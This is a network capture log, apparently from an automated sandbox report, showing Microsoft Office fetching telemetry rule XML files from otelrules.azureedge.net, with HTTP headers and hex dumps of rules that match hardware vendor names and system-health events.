                                                          ETag: "0x8DC582BB56D3AFB"
                                                          x-ms-request-id: 44a2812f-d01e-0028-1207-427896000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165607Z-174f7845968j6t2phC1EWRcfe800000014s000000000w4ew
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:08 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          20192.168.2.44977413.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:07 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:08 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:07 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 3788
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                          ETag: "0x8DC582BAC2126A6"
                                                          x-ms-request-id: 0b3277ea-501e-00a0-5e91-3f9d9f000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165607Z-174f7845968xr5c2hC1EWRd0hn0000000pp0000000002g23
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:08 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          21192.168.2.44977513.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:07 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:08 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:07 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 450
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                          ETag: "0x8DC582BD4C869AE"
                                                          x-ms-request-id: e0d2e361-601e-00ab-06d4-4366f4000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165607Z-174f7845968vqt9xhC1EWRgten00000014t000000000aq7e
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:08 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          22192.168.2.44977613.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:07 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:08 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:07 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 2980
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                          ETag: "0x8DC582BA80D96A1"
                                                          x-ms-request-id: 2aedf92b-c01e-00a1-5716-437e4a000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165607Z-174f7845968n2hr8hC1EWR9cag00000014b000000000fnz6
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:08 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          23192.168.2.44977813.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:07 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:08 UTC494INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:07 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 2160
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                          ETag: "0x8DC582BA3B95D81"
                                                          x-ms-request-id: d2130280-a01e-006f-03c7-4313cd000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165607Z-174f7845968psccphC1EWRuz9s00000014y000000000gkpc
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:08 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          24192.168.2.44978313.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:09 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:10 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:10 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 467
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                          ETag: "0x8DC582BA6C038BC"
                                                          x-ms-request-id: c220f382-901e-0029-3552-43274a000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165610Z-174f7845968n2hr8hC1EWR9cag00000014a000000000m6rc
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:10 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          25192.168.2.44977913.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:10 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:10 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:10 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 474
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                          ETag: "0x8DC582B9964B277"
                                                          x-ms-request-id: 25544c2c-a01e-00ab-8007-419106000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165610Z-174f7845968jrjrxhC1EWRmmrs00000014yg000000001h90
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:10 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          26192.168.2.44978213.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:10 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:10 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:10 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 632
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                          ETag: "0x8DC582BB6E3779E"
                                                          x-ms-request-id: f20189e0-201e-005d-0f7c-43afb3000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165610Z-174f7845968xlwnmhC1EWR0sv800000014g000000000me4e
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:10 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          27192.168.2.44978113.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:10 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:10 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:10 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 471
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                          ETag: "0x8DC582BB10C598B"
                                                          x-ms-request-id: e8c785f0-901e-0048-4ed4-43b800000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165610Z-174f7845968xlwnmhC1EWR0sv800000014g000000000me4f
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:10 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          28192.168.2.44978013.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:10 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:10 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:10 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 415
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                          ETag: "0x8DC582B9F6F3512"
                                                          x-ms-request-id: e1e1876a-701e-0001-22c7-43b110000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165610Z-174f784596886s2bhC1EWR743w00000014rg00000000fbkb
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:10 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          29192.168.2.44978513.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:12 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:12 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:12 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 407
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                          ETag: "0x8DC582BBAD04B7B"
                                                          x-ms-request-id: 12c713eb-c01e-0034-6a92-432af6000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165612Z-174f7845968pf68xhC1EWRr4h800000014w000000000rwhn
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:12 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          30192.168.2.44978813.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:12 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:12 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:12 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 427
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                          ETag: "0x8DC582BA310DA18"
                                                          x-ms-request-id: 7b1224ad-601e-0097-014f-44f33a000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165612Z-174f784596886s2bhC1EWR743w00000014rg00000000fbq2
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
